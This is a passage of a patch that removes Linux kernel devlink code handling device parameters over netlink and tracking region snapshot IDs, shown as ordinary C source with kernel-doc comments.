+-devlink_param_find_by_id(struct list_head *param_list, u32 param_id)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	list_for_each_entry(param_item, param_list, list)
+-		if (param_item->param->id == param_id)
+-			return param_item;
+-	return NULL;
+-}
+-
+-static bool
+-devlink_param_cmode_is_supported(const struct devlink_param *param,
+-				 enum devlink_param_cmode cmode)
+-{
+-	return test_bit(cmode, &param->supported_cmodes);
+-}
+-
+-static int devlink_param_get(struct devlink *devlink,
+-			     const struct devlink_param *param,
+-			     struct devlink_param_gset_ctx *ctx)
+-{
+-	if (!param->get || devlink->reload_failed)
+-		return -EOPNOTSUPP;
+-	return param->get(devlink, param->id, ctx);
+-}
+-
+-static int devlink_param_set(struct devlink *devlink,
+-			     const struct devlink_param *param,
+-			     struct devlink_param_gset_ctx *ctx)
+-{
+-	if (!param->set || devlink->reload_failed)
+-		return -EOPNOTSUPP;
+-	return param->set(devlink, param->id, ctx);
+-}
+-
+-static int
+-devlink_param_type_to_nla_type(enum devlink_param_type param_type)
+-{
+-	switch (param_type) {
+-	case DEVLINK_PARAM_TYPE_U8:
+-		return NLA_U8;
+-	case DEVLINK_PARAM_TYPE_U16:
+-		return NLA_U16;
+-	case DEVLINK_PARAM_TYPE_U32:
+-		return NLA_U32;
+-	case DEVLINK_PARAM_TYPE_STRING:
+-		return NLA_STRING;
+-	case DEVLINK_PARAM_TYPE_BOOL:
+-		return NLA_FLAG;
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int
+-devlink_nl_param_value_fill_one(struct sk_buff *msg,
+-				enum devlink_param_type type,
+-				enum devlink_param_cmode cmode,
+-				union devlink_param_value val)
+-{
+-	struct nlattr *param_value_attr;
+-
+-	param_value_attr = nla_nest_start_noflag(msg,
+-						 DEVLINK_ATTR_PARAM_VALUE);
+-	if (!param_value_attr)
+-		goto nla_put_failure;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_CMODE, cmode))
+-		goto value_nest_cancel;
+-
+-	switch (type) {
+-	case DEVLINK_PARAM_TYPE_U8:
+-		if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu8))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_U16:
+-		if (nla_put_u16(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu16))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_U32:
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PARAM_VALUE_DATA, val.vu32))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_STRING:
+-		if (nla_put_string(msg, DEVLINK_ATTR_PARAM_VALUE_DATA,
+-				   val.vstr))
+-			goto value_nest_cancel;
+-		break;
+-	case DEVLINK_PARAM_TYPE_BOOL:
+-		if (val.vbool &&
+-		    nla_put_flag(msg, DEVLINK_ATTR_PARAM_VALUE_DATA))
+-			goto value_nest_cancel;
+-		break;
+-	}
+-
+-	nla_nest_end(msg, param_value_attr);
+-	return 0;
+-
+-value_nest_cancel:
+-	nla_nest_cancel(msg, param_value_attr);
+-nla_put_failure:
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_param_fill(struct sk_buff *msg, struct devlink *devlink,
+-				 unsigned int port_index,
+-				 struct devlink_param_item *param_item,
+-				 enum devlink_command cmd,
+-				 u32 portid, u32 seq, int flags)
+-{
+-	union devlink_param_value param_value[DEVLINK_PARAM_CMODE_MAX + 1];
+-	bool param_value_set[DEVLINK_PARAM_CMODE_MAX + 1] = {};
+-	const struct devlink_param *param = param_item->param;
+-	struct devlink_param_gset_ctx ctx;
+-	struct nlattr *param_values_list;
+-	struct nlattr *param_attr;
+-	int nla_type;
+-	void *hdr;
+-	int err;
+-	int i;
+-
+-	/* Get value from driver part to driverinit configuration mode */
+-	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
+-		if (!devlink_param_cmode_is_supported(param, i))
+-			continue;
+-		if (i == DEVLINK_PARAM_CMODE_DRIVERINIT) {
+-			if (!param_item->driverinit_value_valid)
+-				return -EOPNOTSUPP;
+-			param_value[i] = param_item->driverinit_value;
+-		} else {
+-			ctx.cmode = i;
+-			err = devlink_param_get(devlink, param, &ctx);
+-			if (err)
+-				return err;
+-			param_value[i] = ctx.val;
+-		}
+-		param_value_set[i] = true;
+-	}
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto genlmsg_cancel;
+-
+-	if (cmd == DEVLINK_CMD_PORT_PARAM_GET ||
+-	    cmd == DEVLINK_CMD_PORT_PARAM_NEW ||
+-	    cmd == DEVLINK_CMD_PORT_PARAM_DEL)
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, port_index))
+-			goto genlmsg_cancel;
+-
+-	param_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_PARAM);
+-	if (!param_attr)
+-		goto genlmsg_cancel;
+-	if (nla_put_string(msg, DEVLINK_ATTR_PARAM_NAME, param->name))
+-		goto param_nest_cancel;
+-	if (param->generic && nla_put_flag(msg, DEVLINK_ATTR_PARAM_GENERIC))
+-		goto param_nest_cancel;
+-
+-	nla_type = devlink_param_type_to_nla_type(param->type);
+-	if (nla_type < 0)
+-		goto param_nest_cancel;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_PARAM_TYPE, nla_type))
+-		goto param_nest_cancel;
+-
+-	param_values_list = nla_nest_start_noflag(msg,
+-						  DEVLINK_ATTR_PARAM_VALUES_LIST);
+-	if (!param_values_list)
+-		goto param_nest_cancel;
+-
+-	for (i = 0; i <= DEVLINK_PARAM_CMODE_MAX; i++) {
+-		if (!param_value_set[i])
+-			continue;
+-		err = devlink_nl_param_value_fill_one(msg, param->type,
+-						      i, param_value[i]);
+-		if (err)
+-			goto values_list_nest_cancel;
+-	}
+-
+-	nla_nest_end(msg, param_values_list);
+-	nla_nest_end(msg, param_attr);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-values_list_nest_cancel:
+-	nla_nest_end(msg, param_values_list);
+-param_nest_cancel:
+-	nla_nest_cancel(msg, param_attr);
+-genlmsg_cancel:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_param_notify(struct devlink *devlink,
+-				 unsigned int port_index,
+-				 struct devlink_param_item *param_item,
+-				 enum devlink_command cmd)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_PARAM_NEW && cmd != DEVLINK_CMD_PARAM_DEL &&
+-		cmd != DEVLINK_CMD_PORT_PARAM_NEW &&
+-		cmd != DEVLINK_CMD_PORT_PARAM_DEL);
+-	ASSERT_DEVLINK_REGISTERED(devlink);
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-	err = devlink_nl_param_fill(msg, devlink, port_index, param_item, cmd,
+-				    0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-static int devlink_nl_cmd_param_get_dumpit(struct sk_buff *msg,
+-					   struct netlink_callback *cb)
+-{
+-	struct devlink_param_item *param_item;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(param_item, &devlink->param_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_param_fill(msg, devlink, 0, param_item,
+-						    DEVLINK_CMD_PARAM_GET,
+-						    NETLINK_CB(cb->skb).portid,
+-						    cb->nlh->nlmsg_seq,
+-						    NLM_F_MULTI);
+-			if (err == -EOPNOTSUPP) {
+-				err = 0;
+-			} else if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-devlink_param_type_get_from_info(struct genl_info *info,
+-				 enum devlink_param_type *param_type)
+-{
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_TYPE))
+-		return -EINVAL;
+-
+-	switch (nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_TYPE])) {
+-	case NLA_U8:
+-		*param_type = DEVLINK_PARAM_TYPE_U8;
+-		break;
+-	case NLA_U16:
+-		*param_type = DEVLINK_PARAM_TYPE_U16;
+-		break;
+-	case NLA_U32:
+-		*param_type = DEVLINK_PARAM_TYPE_U32;
+-		break;
+-	case NLA_STRING:
+-		*param_type = DEVLINK_PARAM_TYPE_STRING;
+-		break;
+-	case NLA_FLAG:
+-		*param_type = DEVLINK_PARAM_TYPE_BOOL;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_param_value_get_from_info(const struct devlink_param *param,
+-				  struct genl_info *info,
+-				  union devlink_param_value *value)
+-{
+-	struct nlattr *param_data;
+-	int len;
+-
+-	param_data = info->attrs[DEVLINK_ATTR_PARAM_VALUE_DATA];
+-
+-	if (param->type != DEVLINK_PARAM_TYPE_BOOL && !param_data)
+-		return -EINVAL;
+-
+-	switch (param->type) {
+-	case DEVLINK_PARAM_TYPE_U8:
+-		if (nla_len(param_data) != sizeof(u8))
+-			return -EINVAL;
+-		value->vu8 = nla_get_u8(param_data);
+-		break;
+-	case DEVLINK_PARAM_TYPE_U16:
+-		if (nla_len(param_data) != sizeof(u16))
+-			return -EINVAL;
+-		value->vu16 = nla_get_u16(param_data);
+-		break;
+-	case DEVLINK_PARAM_TYPE_U32:
+-		if (nla_len(param_data) != sizeof(u32))
+-			return -EINVAL;
+-		value->vu32 = nla_get_u32(param_data);
+-		break;
+-	case DEVLINK_PARAM_TYPE_STRING:
+-		len = strnlen(nla_data(param_data), nla_len(param_data));
+-		if (len == nla_len(param_data) ||
+-		    len >= __DEVLINK_PARAM_MAX_STRING_VALUE)
+-			return -EINVAL;
+-		strcpy(value->vstr, nla_data(param_data));
+-		break;
+-	case DEVLINK_PARAM_TYPE_BOOL:
+-		if (param_data && nla_len(param_data))
+-			return -EINVAL;
+-		value->vbool = nla_get_flag(param_data);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static struct devlink_param_item *
+-devlink_param_get_from_info(struct list_head *param_list,
+-			    struct genl_info *info)
+-{
+-	char *param_name;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_NAME))
+-		return NULL;
+-
+-	param_name = nla_data(info->attrs[DEVLINK_ATTR_PARAM_NAME]);
+-	return devlink_param_find_by_name(param_list, param_name);
+-}
+-
+-static int devlink_nl_cmd_param_get_doit(struct sk_buff *skb,
+-					 struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_param_item *param_item;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	param_item = devlink_param_get_from_info(&devlink->param_list, info);
+-	if (!param_item)
+-		return -EINVAL;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_param_fill(msg, devlink, 0, param_item,
+-				    DEVLINK_CMD_PARAM_GET,
+-				    info->snd_portid, info->snd_seq, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int __devlink_nl_cmd_param_set_doit(struct devlink *devlink,
+-					   unsigned int port_index,
+-					   struct list_head *param_list,
+-					   struct genl_info *info,
+-					   enum devlink_command cmd)
+-{
+-	enum devlink_param_type param_type;
+-	struct devlink_param_gset_ctx ctx;
+-	enum devlink_param_cmode cmode;
+-	struct devlink_param_item *param_item;
+-	const struct devlink_param *param;
+-	union devlink_param_value value;
+-	int err = 0;
+-
+-	param_item = devlink_param_get_from_info(param_list, info);
+-	if (!param_item)
+-		return -EINVAL;
+-	param = param_item->param;
+-	err = devlink_param_type_get_from_info(info, &param_type);
+-	if (err)
+-		return err;
+-	if (param_type != param->type)
+-		return -EINVAL;
+-	err = devlink_param_value_get_from_info(param, info, &value);
+-	if (err)
+-		return err;
+-	if (param->validate) {
+-		err = param->validate(devlink, param->id, value, info->extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_PARAM_VALUE_CMODE))
+-		return -EINVAL;
+-	cmode = nla_get_u8(info->attrs[DEVLINK_ATTR_PARAM_VALUE_CMODE]);
+-	if (!devlink_param_cmode_is_supported(param, cmode))
+-		return -EOPNOTSUPP;
+-
+-	if (cmode == DEVLINK_PARAM_CMODE_DRIVERINIT) {
+-		if (param->type == DEVLINK_PARAM_TYPE_STRING)
+-			strcpy(param_item->driverinit_value.vstr, value.vstr);
+-		else
+-			param_item->driverinit_value = value;
+-		param_item->driverinit_value_valid = true;
+-	} else {
+-		if (!param->set)
+-			return -EOPNOTSUPP;
+-		ctx.val = value;
+-		ctx.cmode = cmode;
+-		err = devlink_param_set(devlink, param, &ctx);
+-		if (err)
+-			return err;
+-	}
+-
+-	devlink_param_notify(devlink, port_index, param_item, cmd);
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_param_set_doit(struct sk_buff *skb,
+-					 struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	return __devlink_nl_cmd_param_set_doit(devlink, 0, &devlink->param_list,
+-					       info, DEVLINK_CMD_PARAM_NEW);
+-}
+-
+-static int devlink_nl_cmd_port_param_get_dumpit(struct sk_buff *msg,
+-						struct netlink_callback *cb)
+-{
+-	NL_SET_ERR_MSG_MOD(cb->extack, "Port params are not supported");
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_port_param_get_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
+-	return -EINVAL;
+-}
+-
+-static int devlink_nl_cmd_port_param_set_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	NL_SET_ERR_MSG_MOD(info->extack, "Port params are not supported");
+-	return -EINVAL;
+-}
+-
+-static int devlink_nl_region_snapshot_id_put(struct sk_buff *msg,
+-					     struct devlink *devlink,
+-					     struct devlink_snapshot *snapshot)
+-{
+-	struct nlattr *snap_attr;
+-	int err;
+-
+-	snap_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_SNAPSHOT);
+-	if (!snap_attr)
+-		return -EINVAL;
+-
+-	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID, snapshot->id);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, snap_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, snap_attr);
+-	return err;
+-}
+-
+-static int devlink_nl_region_snapshots_id_put(struct sk_buff *msg,
+-					      struct devlink *devlink,
+-					      struct devlink_region *region)
+-{
+-	struct devlink_snapshot *snapshot;
+-	struct nlattr *snapshots_attr;
+-	int err;
+-
+-	snapshots_attr = nla_nest_start_noflag(msg,
+-					       DEVLINK_ATTR_REGION_SNAPSHOTS);
+-	if (!snapshots_attr)
+-		return -EINVAL;
+-
+-	list_for_each_entry(snapshot, &region->snapshot_list, list) {
+-		err = devlink_nl_region_snapshot_id_put(msg, devlink, snapshot);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	nla_nest_end(msg, snapshots_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, snapshots_attr);
+-	return err;
+-}
+-
+-static int devlink_nl_region_fill(struct sk_buff *msg, struct devlink *devlink,
+-				  enum devlink_command cmd, u32 portid,
+-				  u32 seq, int flags,
+-				  struct devlink_region *region)
+-{
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = devlink_nl_put_handle(msg, devlink);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	if (region->port) {
+-		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
+-				  region->port->index);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME, region->ops->name);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
+-				region->size,
+-				DEVLINK_ATTR_PAD);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_u32(msg, DEVLINK_ATTR_REGION_MAX_SNAPSHOTS,
+-			  region->max_snapshots);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = devlink_nl_region_snapshots_id_put(msg, devlink, region);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static struct sk_buff *
+-devlink_nl_region_notify_build(struct devlink_region *region,
+-			       struct devlink_snapshot *snapshot,
+-			       enum devlink_command cmd, u32 portid, u32 seq)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct sk_buff *msg;
+-	void *hdr;
+-	int err;
+-
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return ERR_PTR(-ENOMEM);
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, 0, cmd);
+-	if (!hdr) {
+-		err = -EMSGSIZE;
+-		goto out_free_msg;
+-	}
+-
+-	err = devlink_nl_put_handle(msg, devlink);
+-	if (err)
+-		goto out_cancel_msg;
+-
+-	if (region->port) {
+-		err = nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX,
+-				  region->port->index);
+-		if (err)
+-			goto out_cancel_msg;
+-	}
+-
+-	err = nla_put_string(msg, DEVLINK_ATTR_REGION_NAME,
+-			     region->ops->name);
+-	if (err)
+-		goto out_cancel_msg;
+-
+-	if (snapshot) {
+-		err = nla_put_u32(msg, DEVLINK_ATTR_REGION_SNAPSHOT_ID,
+-				  snapshot->id);
+-		if (err)
+-			goto out_cancel_msg;
+-	} else {
+-		err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_SIZE,
+-					region->size, DEVLINK_ATTR_PAD);
+-		if (err)
+-			goto out_cancel_msg;
+-	}
+-	genlmsg_end(msg, hdr);
+-
+-	return msg;
+-
+-out_cancel_msg:
+-	genlmsg_cancel(msg, hdr);
+-out_free_msg:
+-	nlmsg_free(msg);
+-	return ERR_PTR(err);
+-}
+-
+-static void devlink_nl_region_notify(struct devlink_region *region,
+-				     struct devlink_snapshot *snapshot,
+-				     enum devlink_command cmd)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct sk_buff *msg;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_REGION_NEW && cmd != DEVLINK_CMD_REGION_DEL);
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = devlink_nl_region_notify_build(region, snapshot, cmd, 0, 0);
+-	if (IS_ERR(msg))
+-		return;
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-/**
+- * __devlink_snapshot_id_increment - Increment number of snapshots using an id
+- *	@devlink: devlink instance
+- *	@id: the snapshot id
+- *
+- *	Track when a new snapshot begins using an id. Load the count for the
+- *	given id from the snapshot xarray, increment it, and store it back.
+- *
+- *	Called when a new snapshot is created with the given id.
+- *
+- *	The id *must* have been previously allocated by
+- *	devlink_region_snapshot_id_get().
+- *
+- *	Returns 0 on success, or an error on failure.
+- */
+-static int __devlink_snapshot_id_increment(struct devlink *devlink, u32 id)
+-{
+-	unsigned long count;
+-	void *p;
+-	int err;
+-
+-	xa_lock(&devlink->snapshot_ids);
+-	p = xa_load(&devlink->snapshot_ids, id);
+-	if (WARN_ON(!p)) {
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	if (WARN_ON(!xa_is_value(p))) {
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	count = xa_to_value(p);
+-	count++;
+-
+-	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
+-				GFP_ATOMIC));
+-unlock:
+-	xa_unlock(&devlink->snapshot_ids);
+-	return err;
+-}
+-
+-/**
+- * __devlink_snapshot_id_decrement - Decrease number of snapshots using an id
+- *	@devlink: devlink instance
+- *	@id: the snapshot id
+- *
+- *	Track when a snapshot is deleted and stops using an id. Load the count
+- *	for the given id from the snapshot xarray, decrement it, and store it
+- *	back.
+- *
+- *	If the count reaches zero, erase this id from the xarray, freeing it
+- *	up for future re-use by devlink_region_snapshot_id_get().
+- *
+- *	Called when a snapshot using the given id is deleted, and when the
+- *	initial allocator of the id is finished using it.
+- */
+-static void __devlink_snapshot_id_decrement(struct devlink *devlink, u32 id)
+-{
+-	unsigned long count;
+-	void *p;
+-
+-	xa_lock(&devlink->snapshot_ids);
+-	p = xa_load(&devlink->snapshot_ids, id);
+-	if (WARN_ON(!p))
+-		goto unlock;
+-
+-	if (WARN_ON(!xa_is_value(p)))
+-		goto unlock;
+-
+-	count = xa_to_value(p);
+-
+-	if (count > 1) {
+-		count--;
+-		__xa_store(&devlink->snapshot_ids, id, xa_mk_value(count),
+-			   GFP_ATOMIC);
+-	} else {
+-		/* If this was the last user, we can erase this id */
+-		__xa_erase(&devlink->snapshot_ids, id);
+-	}
+-unlock:
+-	xa_unlock(&devlink->snapshot_ids);
+-}
+-
+-/**
+- *	__devlink_snapshot_id_insert - Insert a specific snapshot ID
+- *	@devlink: devlink instance
+- *	@id: the snapshot id
+- *
+- *	Mark the given snapshot id as used by inserting a zero value into the
+- *	snapshot xarray.
+- *
+- *	This must be called while holding the devlink instance lock. Unlike
+- *	devlink_snapshot_id_get, the initial reference count is zero, not one.
+- *	It is expected that the id will immediately be used before
+- *	releasing the devlink instance lock.
+- *
+- *	Returns zero on success, or an error code if the snapshot id could not
+- *	be inserted.
+- */
+-static int __devlink_snapshot_id_insert(struct devlink *devlink, u32 id)
+-{
+-	int err;
+-
+-	xa_lock(&devlink->snapshot_ids);
+-	if (xa_load(&devlink->snapshot_ids, id)) {
+-		xa_unlock(&devlink->snapshot_ids);
+-		return -EEXIST;
+-	}
+-	err = xa_err(__xa_store(&devlink->snapshot_ids, id, xa_mk_value(0),
+-				GFP_ATOMIC));
+-	xa_unlock(&devlink->snapshot_ids);
+-	return err;
+-}
+-
+-/**
+- *	__devlink_region_snapshot_id_get - get snapshot ID
+- *	@devlink: devlink instance
+- *	@id: storage to return snapshot id
+- *
+- *	Allocates a new snapshot id. Returns zero on success, or a negative
+- *	error on failure. Must be called while holding the devlink instance
+- *	lock.
+- *
+- *	Snapshot IDs are tracked using an xarray which stores the number of
+- *	users of the snapshot id.
+- *
+- *	Note that the caller of this function counts as a 'user', in order to
+- *	avoid race conditions. The caller must release its hold on the
+- *	snapshot by using devlink_region_snapshot_id_put.
+- */
+-static int __devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
+-{
+-	return xa_alloc(&devlink->snapshot_ids, id, xa_mk_value(1),
+-			xa_limit_32b, GFP_KERNEL);
+-}
+-
+-/**
+- *	__devlink_region_snapshot_create - create a new snapshot
+- *	This will add a new snapshot of a region. The snapshot
+- *	will be stored on the region struct and can be accessed
+- *	from devlink. This is useful for future analyses of snapshots.
+- *	Multiple snapshots can be created on a region.
+- *	The @snapshot_id should be obtained using the getter function.
+- *
+- *	Must be called only while holding the region snapshot lock.
+- *
+- *	@region: devlink region of the snapshot
+- *	@data: snapshot data
+- *	@snapshot_id: snapshot id to be created
+- */
+-static int
+-__devlink_region_snapshot_create(struct devlink_region *region,
+-				 u8 *data, u32 snapshot_id)
+-{
+-	struct devlink *devlink = region->devlink;
+-	struct devlink_snapshot *snapshot;
+-	int err;
+-
+-	lockdep_assert_held(&region->snapshot_lock);
+-
+-	/* check if region can hold one more snapshot */
+-	if (region->cur_snapshots == region->max_snapshots)
+-		return -ENOSPC;
+-
+-	if (devlink_region_snapshot_get_by_id(region, snapshot_id))
+-		return -EEXIST;
+-
+-	snapshot = kzalloc(sizeof(*snapshot), GFP_KERNEL);
+-	if (!snapshot)
+-		return -ENOMEM;
+-
+-	err = __devlink_snapshot_id_increment(devlink, snapshot_id);
+-	if (err)
+-		goto err_snapshot_id_increment;
+-
+-	snapshot->id = snapshot_id;
+-	snapshot->region = region;
+-	snapshot->data = data;
+-
+-	list_add_tail(&snapshot->list, &region->snapshot_list);
+-
+-	region->cur_snapshots++;
+-
+-	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_NEW);
+-	return 0;
+-
+-err_snapshot_id_increment:
+-	kfree(snapshot);
+-	return err;
+-}
+-
+-static void devlink_region_snapshot_del(struct devlink_region *region,
+-					struct devlink_snapshot *snapshot)
+-{
+-	struct devlink *devlink = region->devlink;
+-
+-	lockdep_assert_held(&region->snapshot_lock);
+-
+-	devlink_nl_region_notify(region, snapshot, DEVLINK_CMD_REGION_DEL);
+-	region->cur_snapshots--;
+-	list_del(&snapshot->list);
+-	region->ops->destructor(snapshot->data);
+-	__devlink_snapshot_id_decrement(devlink, snapshot->id);
+-	kfree(snapshot);
+-}
+-
+-static int devlink_nl_cmd_region_get_doit(struct sk_buff *skb,
+-					  struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_port *port = NULL;
+-	struct devlink_region *region;
+-	const char *region_name;
+-	struct sk_buff *msg;
+-	unsigned int index;
+-	int err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME))
+-		return -EINVAL;
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port)
+-			return -ENODEV;
+-	}
+-
+-	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region)
+-		return -EINVAL;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_region_fill(msg, devlink, DEVLINK_CMD_REGION_GET,
+-				     info->snd_portid, info->snd_seq, 0,
+-				     region);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_region_get_port_dumpit(struct sk_buff *msg,
+-						 struct netlink_callback *cb,
+-						 struct devlink_port *port,
+-						 int *idx,
+-						 int start)
+-{
+-	struct devlink_region *region;
+-	int err = 0;
+-
+-	list_for_each_entry(region, &port->region_list, list) {
+-		if (*idx < start) {
+-			(*idx)++;
+-			continue;
+-		}
+-		err = devlink_nl_region_fill(msg, port->devlink,
+-					     DEVLINK_CMD_REGION_GET,
+-					     NETLINK_CB(cb->skb).portid,
+-					     cb->nlh->nlmsg_seq,
+-					     NLM_F_MULTI, region);
+-		if (err)
+-			goto out;
+-		(*idx)++;
+-	}
+-
+-out:
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_get_devlink_dumpit(struct sk_buff *msg,
+-						    struct netlink_callback *cb,
+-						    struct devlink *devlink,
+-						    int *idx,
+-						    int start)
+-{
+-	struct devlink_region *region;
+-	struct devlink_port *port;
+-	int err = 0;
+-
+-	devl_lock(devlink);
+-	list_for_each_entry(region, &devlink->region_list, list) {
+-		if (*idx < start) {
+-			(*idx)++;
+-			continue;
+-		}
+-		err = devlink_nl_region_fill(msg, devlink,
+-					     DEVLINK_CMD_REGION_GET,
+-					     NETLINK_CB(cb->skb).portid,
+-					     cb->nlh->nlmsg_seq,
+-					     NLM_F_MULTI, region);
+-		if (err)
+-			goto out;
+-		(*idx)++;
+-	}
+-
+-	list_for_each_entry(port, &devlink->port_list, list) {
+-		err = devlink_nl_cmd_region_get_port_dumpit(msg, cb, port, idx,
+-							    start);
+-		if (err)
+-			goto out;
+-	}
+-
+-out:
+-	devl_unlock(devlink);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_get_dumpit(struct sk_buff *msg,
+-					    struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		err = devlink_nl_cmd_region_get_devlink_dumpit(msg, cb, devlink,
+-							       &idx, start);
+-		devlink_put(devlink);
+-		if (err)
+-			goto out;
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_nl_cmd_region_del(struct sk_buff *skb,
+-				     struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
